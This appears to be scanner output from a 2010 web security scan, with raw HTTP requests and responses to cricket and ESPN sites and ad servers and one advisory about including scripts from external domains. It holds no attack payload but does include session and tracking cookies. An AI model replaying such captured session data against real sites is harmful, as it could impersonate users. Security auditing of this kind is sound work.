HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 337
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/h;222218985;0-0;0;55655958;3-125/125;36444325/36462233/1;;~sscs=%3fhttp://www.cricinfo.com/ci/content/site/451900.html"><img src="http://s0.2mdn.net/viewad/2634245/LegendsOfCricket_125x125.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_news/newsindex;kvcluster=usa;kvpt=index;kvserobject=;kvsite=global;kvbrand=ci;tile=2;sz=125x125;ord=8297579875215888? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/current/story/news.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 337
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/v;222218985;0-0;0;46512224;3-125/125;36444325/36462233/1;;~sscs=%3fhttp://www.cricinfo.com/ci/content/site/451900.html"><img src="http://s0.2mdn.net/viewad/2634245/LegendsOfCricket_125x125.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_news/newsindex;pos=bottom;kvcluster=usa;kvpt=index;kvserobject=;kvsite=global;kvbrand=ci;tile=4;sz=300x250;ord=8297579875215888? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/current/story/news.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:10:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 306
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/n;222218935;4-0;1;46512224;4307-300/250;35413527/35431345/1;;~sscs=%3fhttp://www.scrum.com/"><img src="http://s0.2mdn.net/viewad/2634245/1-ScrumNov08_300x250.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_news/newsindex;kvcluster=usa;kvpt=index;kvserobject=;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=8297579875215888? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/current/story/news.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 317
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/g;223022281;0-0;0;46512224;3454-728/90;35843856/35861710/1;;~sscs=%3fhttp://espnf1.fantasyleague.com/"><img src="http://s0.2mdn.net/viewad/2669937/ESPNF1_Fantasy_728x90.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /pagead/ads?client=ca-pub-2099668450740394&format=120x600_as&output=html&h=600&w=120&channel=8451559297&ad_type=image&color_bg=000000&color_border=000000&color_link=FFFFFF&color_text=CCCCCC&color_url=999999&flash=10.1.85&url=http%3A%2F%2Fwww.dreamcricket.com%2Fdreamcricket%2Ffantasy%2Fprofile_new%2Ftournament.aspx%3FTourId%3DLHWT202010&dt=1289110237970&shv=r20101027&jsv=r20101102&correlator=1289110237985&frm=0&adk=2382361957&ga_vid=110563799.1289110238&ga_sid=1289110238&ga_hid=1045314066&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1172&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=50&biw=1128&bih=991&fu=0&ifi=1&dtd=115&xpc=4Yx4eEgvNK&p=http%3A//www.dreamcricket.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.dreamcricket.com/dreamcricket/fantasy/profile_new/tournament.aspx?TourId=LHWT202010 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 07 Nov 2010 06:10:40 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 4106
GET /pagead/ads?client=ca-pub-2099668450740394&format=728x90_as&output=html&h=90&w=728&channel=1587635158&ad_type=image&color_bg=00659b&color_border=00659b&color_link=FFFFFF&color_text=AECCEB&color_url=AECCEB&flash=10.1.85&url=http%3A%2F%2Fwww.dreamcricket.com%2Fdreamcricket%2Ffantasy%2Fprofile_new%2Ftournament.aspx%3FTourId%3DLHWT202010&dt=1289110238094&shv=r20101027&jsv=r20101102&prev_fmts=120x600_as&correlator=1289110237985&frm=0&adk=1825254690&ga_vid=110563799.1289110238&ga_sid=1289110238&ga_hid=1045314066&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1172&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=50&biw=1112&bih=991&fu=0&ifi=2&dtd=8&xpc=KMfO06913U&p=http%3A//www.dreamcricket.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.dreamcricket.com/dreamcricket/fantasy/profile_new/tournament.aspx?TourId=LHWT202010 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 07 Nov 2010 06:10:40 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 3957
<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - www.cricshop.com/Replica-Cricket-Kit/</title><script type="text/javascript">(function(){function a ...[SNIP]... <li>Go to <a href="http://www.cricshop.com/Replica-Cricket-Kit.aspx" onmousedown="return rwctrd(this,'sres','0','http://www.google.com/url?sa=D&q=http://www.cricshop.com/Replica-Cricket-Kit.aspx&usg=AFQjCNHd6WESx7BGwFBXZb6YihZQy6nZJQ');"><b> ...[SNIP]... <li>Go to <a href="http://www.cricshop.com/" onmousedown="return rwctrd(this,'hs','1','http://www.google.com/url?sa=D&q=http://www.cricshop.com/&usg=AFQjCNEJ9d5Fz02D8OMkMA0eEz4Hk12i7w');"><b> ...[SNIP]...
GET /lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm HTTP/1.1 Host: www.icicibankm2i.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 06:10:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 10168 Content-Type: text/html Expires: Sat, 06 Nov 2010 18:30:00 GMT Set-Cookie: USER=USERTYPE=cricinfo%5Fna%5Ftext%5Fcpm&USERURL=UserType%3Dcricinfo%5Fna%5Ftext%5Fcpm; path=/ Set-Cookie: ASPSESSIONIDSCAAAQSC=GCIEBDPCNHDMKBPMLMIMHHCD; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... k" and/or its Affiliates/group companies and is subject to product/service specific terms & conditions... Please familiarise yourself with the terms and conditions applicable, available at <a href="http://www.money2india.com/" target="_blank" style="text-decoration:none; color:#af2a30;">www.money2india.com</a> ...[SNIP]... <!--Script for Capturing data for Web Trends --> <SCRIPT language=JavaScript src="http://www.icicibank.com/pfsuser/js/webtrends_indnl.js" type=text/javascript></script> <NOSCRIPT> <IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://sdc.icicibank.com/dcs0wc0p0100008qxh3a7m16r_4b2y/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.2"> </NOSCRIPT> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /espn3/player HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:09:34 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:59:13 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sun, 07 Nov 2010 06:07:32 GMT Content-Length: 21094 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espntv/espnTopics HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:10:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:52:17 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 15:00:54 GMT Content-Length: 23615 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /golf/leaderboard HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 06:11:05 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sun, 07 Nov 2010 06:09:39 GMT Content-Length: 106383 Cache-Control: no-cache Pragma: no-cache Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /horse-racing/breederscup2010/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:14:16 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:57:47 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sun, 07 Nov 2010 06:06:25 GMT Content-Length: 68480 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /minorlbb/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:18:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 15:12:48 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Cache-Expires: Sat, 06 Nov 2010 15:13:43 GMT Content-Length: 29273 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /minorlbb/scoreboard HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:20:37 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:20:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sun, 07 Nov 2010 06:21:15 GMT Content-Length: 29233 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /minorlbb/standings HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:21:21 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:21:21 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sun, 07 Nov 2010 06:21:59 GMT Content-Length: 82980 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /minorlbb/statistics HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:24:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 15:25:05 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 15:25:43 GMT Content-Length: 48424 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
